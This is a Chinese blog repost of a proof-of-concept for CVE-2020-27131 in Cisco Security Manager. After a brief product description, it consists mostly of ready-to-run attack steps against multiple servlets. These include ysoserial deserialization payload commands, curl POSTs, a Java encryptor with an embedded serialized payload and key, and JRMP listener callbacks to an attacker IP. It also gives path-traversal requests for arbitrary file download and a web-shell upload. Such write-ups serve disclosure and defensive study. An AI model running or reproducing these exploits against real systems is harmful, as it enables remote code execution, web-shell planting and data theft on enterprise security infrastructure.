zoukankan      html  css  js  c++  java
  • CVE-2020-27131 思科安全管理器反序列化漏洞 POC

    简介

    思科安全管理器是一个企业级安全管理应用程序,可提供对思科安全和网络设备的了解和控制。 Cisco Security Manager在广泛的Cisco安全设备中提供全面的安全管理(配置和事件管理),包括Cisco ASA自适应安全设备,Cisco IPS系列传感器设备,Cisco集成服务路由器(ISR),Cisco防火墙服务模块(FWSM) ,Cisco Catalyst,Cisco交换机等等。 Cisco Security Manager允许您有效地管理各种规模的网络-从小型网络到包含数百台设备的大型网络。

    POC

    SecretService.jsp 反序列化漏洞

    java -cp ./commons-beanutils-1.6.1.jar:[YOUR_PATH]]/ysoserial-0.0.6-SNAPSHOT-all.jar ysoserial.GeneratePayload CommonsBeanutils1 "cmd.exe /c calc.exe" > payload_CommonsBeanutils

    curl -k --request POST --data-binary "@payload_CommonsBeanutils" https://[TARGET_HOST]/CSCOnm/servlet/SecretService.jsp

    CsJaasServiceServlet 反序列化漏洞

    Compile JaasEncryptor.java and replace the b64Payload content:

    import java.security.InvalidKeyException;
    import java.util.Base64;
    import com.cisco.nm.cmf.security.jaas.BlobCrypt;
    
    public class JaasEncryptor {
    
            public static void main(String args[]) {
                    String b64Payload = "rO0ABXN9AAAAAQAaamF2YS5ybWkucmVnaXN0cnkuUmVnaXN0cnl4cgAXamF2YS5sYW5nLnJlZmxlY3QuUHJveHnhJ9ogzBBDywIAAUwAAWh0ACVMamF2YS9sYW5nL3JlZmxlY3QvSW52b2NhdGlvbkhhbmRsZXI7eHBzcgAtamF2YS5ybWkuc2VydmVyLlJlbW90ZU9iamVjdEludm9jYXRpb25IYW5kbGVyAAAAAAAAAAICAAB4cgAcamF2YS5ybWkuc2VydmVyLlJlbW90ZU9iamVjdNNhtJEMYTMeAwAAeHB3MQAKVW5pY2FzdFJlZgAIMTAuMC4wLjIAAAG7AAAAAEBnvkQAAAAAAAAAAAAAAAAAAAB4";
    
                    byte[] payload = Base64.getDecoder().decode(b64Payload);
                    byte[] key = new byte[]{-100, 76, -23, 87, 125, 0, 5, 94, 12, 76, 37, -84, 36, 78, 123, 5};
                    
                    byte[] enc = BlobCrypt.encryptArray(payload, key);
                    System.out.println("Encrypted payload: " + Base64.getEncoder().encodeToString(enc));
                    byte[] dec = BlobCrypt.decryptArray(enc, key);
            }
    }
    

    Prepare JRMP Listener:

    java -cp [YOUR_PATH]/commons-beanutils-1.6.1.jar:[YOUR_PATH]/ysoserial-0.0.6-SNAPSHOT-all.jar ysoserial.exploit.JRMPListener 443

    java -jar [YOUR_PATH]/ysoserial-0.0.6-SNAPSHOT-all.jar JRMPClient '[YOUR_IP]]:443' | base64 -w0

    Compile encrypted payload:

    javac -cp [YOUR_PATH]]/server_jars_classes/jars.jar:./ JaasEncryptor2.java; java -cp [YOUR_PATH]/server_jars_classes/jars.jar:./ JaasEncryptor

    Send payload to Servlet with parameters cmd=data + new line + data=[ENCRYPTED_PAYLOAD].

    AuthTokenServlet 反序列化漏洞

    Prepare JRMP Listener:

    java -cp [YOUR_PATH]/commons-beanutils-1.6.1.jar:[YOUR_PATH]/ysoserial-0.0.6-SNAPSHOT-all.jar ysoserial.exploit.JRMPListener 1337 CommonsBeanutils1 "cmd.exe /c calc.exe"

    java -jar [YOUR_PATH]/ysoserial-0.0.6-SNAPSHOT-all.jar JRMPClient '[YOUR_IP]]:1337' > payload_JRMP1_2

    Send request:

    curl -k --request POST --data-binary "@payload_JRMP1_2" https://[TARGET_IP]/CSCOnm/servlet/com.cisco.nm.cmf.servlet.AuthTokenServlet

    ClientServicesServlet 反序列化漏洞

    Prepare JRMP listener:

    java -cp [YOUR_PATH]/commons-beanutils-1.6.1.jar:[YOUR_PATH]/ysoserial-0.0.6-SNAPSHOT-all.jar ysoserial.exploit.JRMPListener 1337 CommonsBeanutils1 "cmd.exe /c calc.exe"

    java -jar [YOUR_PATH]/ysoserial-0.0.6-SNAPSHOT-all.jar JRMPClient '[YOUR_IP]:1337' > payload_JRMP1_3

    Send request:

    curl -k --request POST --data-binary "@payload_JRMP1_3" https://[TARGET_IP]/CSCOnm/servlet/com.cisco.nm.cmf.servlet.ClientServicesServlet

    CTMServlet 反序列化漏洞

    java -cp ./commons-beanutils-1.6.1.jar:[YOUR_PATH]/ysoserial-0.0.6-SNAPSHOT-all.jar ysoserial.GeneratePayload CommonsBeanutils1 "cmd.exe /c calc.exe" > payload_CommonsBeanutils1_2

    curl -i -s -k -X $'POST' -H $'Content-Type: application/octet-stream' -H $'CTM-URN: com-cisco-nm-vms-ipintel-IpIntelligenceApi' -H $'CTM-VERSION: 1.5' -H $'CTM-PRODUCT-ID: /C:/Program Files (x86)/CSCOpx/MDC/tomcat/vms/athena/WEB-INF/lib/' -H $'Cache-Control: no-cache' -H $'Pragma: no-cache' -H $'User-Agent: Java/1.8.0_222' -H $'Host: [TARGET_IP]' -H $'Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2' -H $'Connection: keep-alive' --data-binary "@payload_CommonsBeanutils1_2" $'https://[TARGET_IP]/athena/CTMServlet'

    XdmConfigRequestHandler任意文件下载

    GET /athena/xdmProxy/xdmConfig[RELATIVE_PATH_TO_FILE]

    XdmResourceRequestHandler 任意文件下载

    GET /athena/xdmProxy/xdmResources[RELATIVE_PATH_TO_FILE]?dmTargetType=TARGET.IDS&dmOsVersion=7.&command=editConfigDelta

    XmpFileUploadServlet 任意文件上传

    Write a web shell e.g.

    POST /cwhp/XmpFileUploadServlet?maxFileSize=100

    Normal multi-part e.g. writing web shell in filename with ../../MDC/tomcat/webapps/cwhp/testme.jsp.

    XmpFileDownloadServlet 任意文件下载

    GET /cwhp/XmpFileDownloadServlet?parameterName=downloadDoc&downloadDirectory=[RELATIVE_PATH_TO_DIRECTORY]&readmeText=1

    This will respond with a ZIP file containing all files from the directory.

    SampleFileDownloadServlet 任意文件下载

    GET /cwhp/SampleFileDownloadServlet?downloadZipFileName=pwned&downloadFiles=README&downloadLocation=[RELATIVE_PATH_TO_DIRECTORY]

    This will respond with a ZIP file containing all files from the directory.

    resultsFrame.jsp 任意文件下载

    GET /athena/itf/resultsFrame.jsp?filename=[RELATIVE_PATH_TO_FILE]

    SecretServiceServlet 反序列化漏洞

    See also https://de.tenable.com/security/research/tra-2017-23

    java -cp [YOUR_PATH]/commons-beanutils-1.6.1.jar:[YOUR_PATH]/ysoserial-0.0.6-SNAPSHOT-all.jar ysoserial.exploit.JRMPListener 1337 CommonsBeanutils1 "cmd.exe /c calc.exe"

    java -jar [YOUR_PATH]/ysoserial-0.0.6-SNAPSHOT-all.jar JRMPClient '[YOUR_IP]:1337' > payload_JRMP1_2

    curl -k --request POST --data-binary "@payload_JRMP1_2" https://[TARGET_IP]/CSCOnm/servlet/com.cisco.nm.cmf.servlet.SecretServiceServlet

    参考

    https://www.zdnet.com/article/cisco-reveals-this-critical-bug-in-cisco-security-manager-after-exploits-are-posted-patch-now/

  • 相关阅读:
    Google Chart API 阮一峰的网络日志
    PHP随机函数【上】
    php实现socket推送技术
    javascript变量作用域
    如何使用jqplot描绘一个简单的线形图?
    培训小记
    Google自己的浏览器GoogleChrome
    这大半年的回顾
    一个高手的SQL求工作天数的函数
    关于TSQL中数据库重命名
  • 原文地址:https://www.cnblogs.com/potatsoSec/p/13997491.html
Copyright © 2011-2022 走看看